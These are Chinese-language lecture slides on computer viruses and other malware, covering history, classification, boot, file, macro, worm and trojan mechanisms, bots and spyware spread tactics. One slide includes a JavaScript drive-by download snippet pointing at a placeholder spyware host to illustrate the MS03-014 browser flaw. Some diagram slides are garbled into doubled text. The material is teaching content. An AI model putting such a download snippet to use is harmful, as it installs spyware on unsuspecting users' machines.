资料简介
计算机病毒
1. 计算机病毒的起源与发展
2. 计算机病毒的定义与特征 ★
3. 计算机病毒的分类
4. 计算机病毒的危害性
5. 计算机病毒分析 ★
6. 其他恶意程序
计算机病毒的发展史
• 自第一个真正意义上的计算机病毒于1983
年走出实验室以来,人们对它的认识经历
了“不以为然→谈毒色变→口诛笔伐,人
人喊打→理性对待,泰然处之”四个阶段
。
计算机病毒产生的历史
• 1977年:出现在科幻小说中
• 1983年: Fred Cohen:在计算机安全研讨会上发布
• 1986年:巴基斯坦两兄弟为追踪非法拷贝其软件的人制造
了“巴基斯坦”病毒,成了世界上公认的第一个传染PC兼
容机的病毒,并且很快在全球流行。
• 1987年10月:美国发现世界上第一例病毒(Brain)。
• 1988年:小球病毒传入我国,在几个月之内迅速传染了20
多个省、市,成为我国第一个病毒案例。
• 此后,如同打开的潘多拉的盒子,各种计算机病毒层出不
穷!
计算机病毒的发展阶段—萌芽阶
段
1 萌芽阶段
– 1986年到1989年:计算机病毒的萌芽时期
– 病毒清除相对比较容易
特点:
① 攻击目标单一
② 主要采取截取系统中断向量的方式监控系统的运行状
态,并在一定的触发条件下进行传播
③ 传染后特征明显
④ 不具自我保护措施
计算机病毒的发展阶段—综合发展
阶段
2 综合发展阶段
– 1989年到1992年:由简单到复杂,由原始走向成熟
特点:
1. 攻击目标趋于混合型
2. 采用更为隐蔽的方法驻留内存
3. 感染目标后没有明显的特征
4. 开始采用自我保护措施
5. 开始出现变种
计算机病毒的发展阶段—成熟发展
阶段
3 成熟发展阶段
– 1992到1995年:病毒开始具有多态性质。病毒
每次传染目标时,嵌入宿主程序中的病毒程序
大部分可变种,正由于这个特点,传统的特征
码检测病毒法开始了新的探索研究
– 在这个阶段,病毒的发展主要集中在病毒技术
的提高上,病毒开始向多维化方向发展,对反
病毒厂商也提出了新的挑战
计算机病毒的发展阶段—网络病毒
阶段
4 网络病毒阶段
– 1995年到2000年:随着网络的普及,大量的病
毒开始利用网络传播,蠕虫开始大规模的传播。
由于网络的便利和信息的共享,很快又出现了
通过E-mail传播的病毒。由于宏病毒编写简单、
破坏性强、清除复杂,加上微软未对WORD文
档结构公开,给清除宏病毒带来了不便
– 这一阶段的病毒,主要是利用网络来进行传播
和破坏
计算机病毒的发展阶段—迅速壮大的阶
段
5.迅速壮大的阶段
– 2000年以后:成熟繁荣阶段,计算机病毒的更新和传
播手段更加多样性,网络病毒的目的性也更强
– 出现了木马,恶意软件等特定目的的恶意程序
特点:
① 技术综合利用,病毒变种速度大大加快
② 恶意软件和病毒程序直接把矛头对向了杀毒软件
③ 计算机病毒技术和反病毒技术的竞争进一步激化,反
病毒技术也面临着新的洗牌
1. 计算机病毒的起源与发展
2. 计算机病毒的定义与特征 ★
3. 计算机病毒的分类
4. 计算机病毒的危害性
5. 计算机病毒分析 ★
6. 其他恶意程序
计算机病毒的定义
• 狭义定义
– 计算机病毒是一种靠修改其它程序来插入或进行自身拷贝,从而
感染其它程序的一种程序。
—— Fred Cohen博士对计算机病毒的定义。
• 广义定义
– 能够引起计算机故障,破坏计算机数据,影响计算机系统的正常
使用的程序代码。
• 我国定义
– 《中华人民共和国计算机信息系统安全保护条例》第二十八条:
"计算机病毒,是指编制或者在计算机程序中插入的破坏计算机功
能或者毁坏数据,影响计算机使用,并能自我复制的一组计算机
指令或者程序代码。”
计算机病毒的特征
基本特征
1. 传染性
– 自我复制,通过多种渠道传播
2. 潜伏性
– 感染后不一定立刻发作
– 依附于其他文件、程序、介质,不被发现
3. 可触发性
– 触发条件:日期、时间、文件类型
4. 破坏性
– 破坏数据的完整性和可用性
– 破坏数据的保密性
– 系统和资源的可用性
5. 非授权可执行性
计算机病毒的特征
其它特征
1. 寄生性
– 寄生于其它文件、程序
2. 隐蔽性
– 程序隐蔽、传染隐蔽;
– 不易被发现
3. 针对性*
– 针对特定的计算机、特定的操作系统
4. 多态性*
– 每一次感染后改变形态,检测更困难
5. 持久性*
– 难于清除
1. 计算机病毒的起源与发展
2. 计算机病毒的定义与特征 ★
3. 计算机病毒的分类
4. 计算机病毒的危害性
5. 计算机病毒分析 ★
6. 其他恶意程序
计算机病毒的分类
• 按宿主分类
• 按危害分类
• 按传播媒介分类
• 按攻击平台分类
计算机病毒的分类
• 按宿主分类
– 1)引导型病毒
• 主引导区
• 操作系统引导区
– 2)文件型病毒
• 操作系统
• 应用程序
• 宏病毒
– 3)复合型病毒
• 复合型病毒具有引导区型病毒和文件型病毒两者的
特征
计算机病毒的分类
• 按危害分类
– 良性病毒
• 如:小球病毒
– 恶性病毒
• 如:CIH病毒
计算机病毒的分类
• 按传播媒介分类
– 单机病毒
• DOS、Windows、Unix/Linux病毒等
– 网络病毒
• 通过网络或电子邮件传播
计算机病毒的分类
• 按攻击平台分类
– DOS病毒:MS-DOS及兼容操作系统上编写的病
毒
– Windows病毒:Win32上编写的纯32位病毒程序
– MAC病毒
– Unix/Linux病毒
1. 计算机病毒的起源与发展
2. 计算机病毒的定义与特征 ★
3. 计算机病毒的分类
4. 计算机病毒的危害性
5. 计算机病毒分析 ★
6. 其他恶意程序
计算机病毒的危害性
1. 攻击系统数据区
– 攻击部位包括硬盘主引导扇区、Boot扇区、FAT表、
文件目录
2. 攻击文件
– 删除、改名、替换内容、丢失簇和对文件加密等
3. 攻击内存
– 内存是计算机的重要资源,也是病毒攻击的重要目标
计算机病毒的危害性
4. 干扰系统运行,使运行速度下降
– 如不执行命令、打不开文件
– 干扰内部命令的执行、扰乱串并接口、虚假报警、强制游戏
– 内部栈溢出、重启动、死机
– 病毒激活时,系统时间延迟程序启动,在时钟中纳入循环计数,
迫使计算机空转,运行速度明显下降
5. 干扰键盘、喇叭或屏幕,适用户无法正常操作
– 响铃、封锁键盘、换字、抹掉缓存区字符、输入紊乱等。
– 许多病毒运行时,会使计算机的喇叭发出响声
– 病毒扰乱显示的方式很多,如字符跌落、倒置、显示前一屏、
打开对话框、光标下跌、滚屏、抖动、乱写等
计算机病毒的危害性
6. 攻击CMOS,破坏系统硬件
– 有的病毒激活时,能够对CMOS进行写入动作,破坏
CMOS中的数据。例如CIH病毒破坏计算机硬件,乱写
某些主板BIOS芯片,损坏硬盘
7. 干扰打印机
– 如假报警、间断性打印或更换字符
8. 干扰网络正常运行
– 网络病毒破坏网络系统,非法使用网络资源,破坏电
子邮件,发送垃圾信息,占用网络带宽、阻塞网络、
造成拒绝服务等
病毒名称 出现时间 造成的经济损失
莫里斯蠕虫 1988 6000台电脑停机,9600万美元
美丽莎 1999 超过12亿美元
爱虫 2000 100亿美元
红色代码 2001 超过20亿美元
求职信 2001 超过100亿美元
SQL蠕虫王 2003 超过20亿美元
历年重大病毒影响情况
1. 计算机病毒的起源与发展
2. 计算机病毒的定义和特征 ★
3. 计算机病毒的分类
4. 计算机病毒的危害性
5. 计算机病毒分析 ★
6. 其他恶意程序
计算机病毒分析
① 计算机病毒的结构及工作机理
② 引导型病毒分析
③ 文件型病毒分析
④ 宏病毒分析
⑤ 蠕虫病毒分析
⑥ 特洛伊木马分析
①计算机病毒的结构及工作机理
• 计算机病毒的结构
传染条件判断传染条件判断
传染代码传染代码
传染模块传染模块
表现及破坏条件判断表现及破坏条件判断
破坏代码破坏代码
表现模块表现模块
引导代码引导代码引导模块引导模块
①计算机病毒的结构及工作机理
1. 引导过程
– 也就是病毒的初始化部分,它随着宿主程序的执行而进入内存,
为传染部分做准备
2. 传染过程
– 作用是将病毒代码复制到目标上去。一般病毒在对目标进行传
染前,要首先判断传染条件是否满足,判断病毒是否已经感染
过该目标等,如CIH病毒只针对Windows 95/98操作系统
3. 表现过程
– 是病毒间差异最大的部分,前两部分是为这部分服务的。它破
坏被传染系统或者在被传染系统的设备上表现出特定的现象。
大部分病毒都是在一定条件下才会触发其表现部分的
②引导型病毒实例分析
• 引导型病毒
– 传染机理
• 利用系统启动的缺陷
– 传染目标
• 硬盘的主引导区和引导区
• 软盘的引导区
– 传染途径
• 通过软盘启动计算机
– 防治办法
• 从C盘启动
• 打开主板的方病毒功能
– 典型病毒
• 小球病毒、大麻病毒、火炬病毒、Anti-CMOS病毒
②引导型病毒分析
• 引导型病毒
– 引导扇区是大部分系统启动或引导指令
所保存的地方,而且对所有的磁盘来讲,
不管是否可以引导,都有一个引导扇区。
感染的主要方式就是发生在计算机通过
已被感染的引导盘(常见的如一个软盘)
引导时发生的。
②引导型病毒分析
• 引导型病毒——主引导记录(MBR)
主分区表主分区表(64(64
字节)字节)
结束标记结束标记
((22字节)字节)
引导代码及引导代码及
出错信息出错信息
55AA55AA
主引导程序主引导程序(446(446字节字节))
分区分区1(16 1(16 字节字节))
分区分区2(16 2(16 字节字节))
分区分区3(16 3(16 字节字节))
分区分区4(16 4(16 字节字节))
A
②引导型病毒分析
• 引导型病毒——系统引导过程
Power OnPower On CPU & ROM CPU & ROM
BIOS InitializesBIOS Initializes POST TestsPOST Tests
Look for Look for
boot deviceboot device
MBR bootMBR boot
Partition Table LoadPartition Table Load
DOS Boot DOS Boot
Sector RunsSector Runs
Loads IO.SYSLoads IO.SYS
MSDOS.SYSMSDOS.SYS DOS LoadedDOS Loaded
②引导型病毒分析
• 引导型病毒——感染与执行过程
。。
病毒病毒
系统引导区系统引导区 引导引导
正常执行正常执行
病毒病毒
病毒执行
病毒驻留带毒执行
。。
。
引导系统引导系统
病毒体病毒体
。
。 。
③文件型病毒分析
• 文件型病毒
– 传染机理:利用系统加载执行文件的缺陷
– 传染目标:各种能够获得系统控制权执行的文件
– 传染途径:各种存储介质、网络、电子邮件
– 防治办法
• 使用具有实时监控功能的杀毒软件
• 不要轻易打开邮件附件
– 典型病毒
• 1575病毒、CIH病毒
③文件型病毒分析
• 文件型病毒
文件型病毒与引导扇区病毒区别是:它攻击磁盘上的文件
③文件型病毒分析
• 文件型病毒——传染机理
正常正常
程序程序正常正常
程序程序
程序头程序头
正常正常
程序程序
程序头程序头
正常正常
程序程序
程序头程序头
正常正常
程序程序
程序头程序头
正常正常
程序程序
程序头程序头
正常正常
程序程序
程序头程序头
正常正常
程序程序
程序头程序头
正常正常
程序程序
程序头程序头
正常正常
程序程序
程序头程序头
正常正常
程序程序
程序头程序头正常正常
程序程序
程序头程序头正常正常
程序程序
程序头程序头正常正常
程序程序
程序头程序头
程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头程序头
程序头程序头
病毒程序头病毒程序头
程序头程序头
病毒程序头病毒程序头
程序头程序头
病毒程序头病毒程序头
程序头程序头
病毒程序头病毒程序头
程序头程序头
病毒程序头病毒程序头
程序头程序头
病毒程序头病毒程序头
程序头程序头
病毒程序病毒程序
程序头程序头
病毒程序病毒程序
程序头程序头
病毒程序病毒程序
程序头程序头
病毒程序病毒程序
程序头程序头
病毒程序病毒程序病毒程序病毒程序病毒程序病毒程序
正常正常
程序程序
程序头程序头程序头程序头
④宏病毒分析
• 宏病毒
– 定义:宏病毒是指利用软件所支持的宏命令或语言书
写的一段寄生在支持宏的文档上的,具有复制、传染
能力的宏代码
– 跨平台式计算机病毒:可以在Windows 9X、Windows
NT、OS/2和Unix、Mac等操作系统上执行病毒行为
– 影响系统的性能以及对文档的各种操作,如打开、存
储、关闭或清除等
– 宏病毒对病毒而言是一次革命。现在通过E-mail、3W的
互联能力及宏语言的进一步强化,极大地增强了它的
传播能力
④宏病毒分析
• 宏病毒
– 传染机理:利用处理的文件可以内嵌宏的功能
– 传染目标:doc、dot、xls、ppt、mdb等文件(Win)
– 传染途径:各种存储介质、网络、电子邮件
– 防治办法
• 使用具有实时监控功能的杀毒软件
• 打开系统提供的宏保护功能
– 典型病毒
• “七月杀手”病毒、“美丽莎”病毒
④宏病毒分析
• 宏病毒——工作机理
有毒文件有毒文件.doc.doc Normal.dotNormal.dot
激活激活autoopenautoopen宏宏 写入
无毒文件无毒文件.doc.doc Normal.dotNormal.dot
启动
激活病毒激活病毒
⑤蠕虫病毒分析
• 蠕虫病毒
– 一个独立的计算机程序,不需要宿主
– 自我复制,自主传播(Mobile)
– 占用系统或网络资源、破坏其他程序
– 不伪装成其他程序,靠自主传播
• 利用系统漏洞;
• 利用电子邮件(无需用户参与)
⑤蠕虫病毒分析
• 蠕虫病毒
– 传染机理:利用系统或服务的漏洞
– 传染目标:操作系统或应用服务
– 传染途径:网络、电子邮件
– 防治办法
• 使用具有实时监控功能的杀毒软件
• 不要轻易打开邮件附件
• 打最新补丁,更新系统
– 典型病毒
• RedCode,尼姆达、冲击波等
⑤蠕虫病毒分析
• 实例:莫尔斯蠕虫事件
– 发生于1988年,当时导致大约3000台机器瘫痪
– 主要的攻击方法
• Rsh,rexec:用户的缺省认证
• Sendmail 的debug模式
• Fingerd的缓冲区溢出
• 口令猜测
⑤蠕虫病毒分析
• 实例——RedCode
– 是一种结合了病毒、木马、DDOS机制的蠕虫
– 2001年7月中旬,在美国等地大规模蔓延;
2001年8月初,出现变种codered II,针对中文
版windows系统,国内大规模蔓延
– 特点:
• 通过80端口传播
• 只存在于网络服务器的内存,不通过文件载体
• 利用IIS缓冲区溢出漏洞(2001年6月18日发布)
⑤蠕虫病毒分析
• 实例——RedCode I
– 主要影响Windows NT系统和Windows 2000
• 主要影响国外网络
• 据CERT统计,感染超过25万台
– 主要行为
• 利用IIS 的Index服务的缓冲区溢出缺陷进入系统
• 检查c:\notworm文件是否存在以判断是否感染
• 中文保护(是中文windows就不修改主页)
• 攻击白宫!
⑥特洛伊木马分析
• 特洛伊木马程序
– 名字来源:古希腊故事
– 通过伪装成其他程序、有意隐藏自己恶意行为
的程序,通常留下一个远程控制的后门
– 没有自我复制的功能
– 非自主传播
• 用户主动发送给其他人
• 放到网站上由用户下载
⑥特洛伊木马分析
• 特洛伊木马程序
– 传播途径
• 通过网络下载、电子邮件
– 防治办法
• 使用具有实时监控功能的杀毒软件
• 不要轻易打开邮件附件
• 不要轻易运行来路不明的文件
– 典型例子
• BO、BO2k、Subseven、冰河、广外女生等
病毒、蠕虫与木马的比较
需要不需要需要宿主
留下后门,窃取信
息
侵 占 资 源 ,造 成 拒
绝服务
破坏数据完整性、系统完
整性
主要危害
慢 极快快传播速度
依靠用户主动传播自主传播依赖宿主文件或介质传播方式
伪装成其它文件独立的文件一般不以文件形式存在表现形式
木马蠕虫病毒特性
1. 计算机病毒的起源与发展
2. 计算机病毒的定义和特征 ★
3. 计算机病毒的分类
4. 计算机病毒的危害性
5. 计算机病毒分析 ★
6. 其他恶意程序
其他恶意程序
① 后门(Backdoor)
– 一种能让黑客未经授权进入和使用本系统的
恶意程序
② 僵尸(Bot)
– 一种集后门与蠕虫一体的恶意程序. 通常使用
IRC (Internet Relay Chat) 接受和执行黑客命令
③ 广告软件/间谍软件
①后门
• 具有反侦测能力
– 隐藏文件, 进程, 网络端口和连接, 系统设置,
系统服务
– 可以在恶意程序之中, 例如 Berbew;也有独立
软件, 例如 Hackder Defender
• 为控制者提供远程操作能力
②僵尸
• 僵尸生态系统
– 僵尸
– 僵尸网
– 管理通道
– 看守者
• 从 MyDoom.A开始进入鼎盛期
– 打开后门 TCP port 3127 - 3198
– 下载和执行程序
– 利用被感染的计算机散发电子邮件
– 数以百万计的感染计算机被出卖给了垃圾邮件的制造者
②僵尸——僵尸网发展趋势
1)源代码可在网上免费下载
2)管理方式的变化:
• 过去: 集中管理
– 一个 IRC 服务器管理所有僵尸
– 关闭服务器就破坏了僵尸网
• 现在: 提升
– 注册多个IRC 服务器
– 通讯加密 (AES-128 或更强)
• 今后: 分布式 (P2P)管理
– 对照分析:
• Napster: 集中管理, 容易被关闭
• eDonkey: 分布式管理, 不容易被关闭
③广告软件/间谍软件
• 广告软件
– 弹出窗口及横幅形式向用户提供广告服务
– 通常经过用户授权
• 间谍软件
– 未经授权收集用户信息
– 未经授权上传用户信息
– 未经授权改变系统外表及行为
③广告软件/间谍软件——传播
方式
• 社会工程(欺骗)方法
– 非软件或硬件漏洞
– 电子邮件:附属可执行文件
– 电子邮件:隐蔽真实联接
– 弹出窗口
– 伪装网站
– 附属于其它免费或商业软件
• 利用浏览器瑕疵
– 自动下载及安装
手段一: 虚假安全警告
手段二: “取消”实际为“是”
手段三: 重复
手段四: 附加安装软件
手段五:利用浏览器缺陷
• 一些浏览器缺陷可被利用绕过安全检测和用户提示,直接
启动恶意程序
– 例如,利用MS03-014缺陷自动下载及运行文件
{
u='http://www.not-real-site.com/SpywareFile.chm';
document.write('');
}
恶意程序族谱
间谍程序
Spyware
病 毒
Viruses
木马程序
Trojans
后门程序
BACKDOORS
广告程序
Adware
蠕 虫
WORMS
a. E-mail
b. Network
c. IRC
恶意程序
Malware
“All Worms are Viruses” but “Not all Viruses are Worms”
恶意软件发展趋势
• 专业化
– 集病毒,蠕虫,木马,后门,广告,间谍,恶意核心
程序于一体。
– 只感染一小部分计算机, 以避免被发现。
– 有自动更新功能。
• 商业化
– 以前: 为制造轰动效应(上电台报纸)
– 现在: 钱 (有组织犯罪)
• 散发出垃圾邮件
• 发动中断服务袭击
查看更多
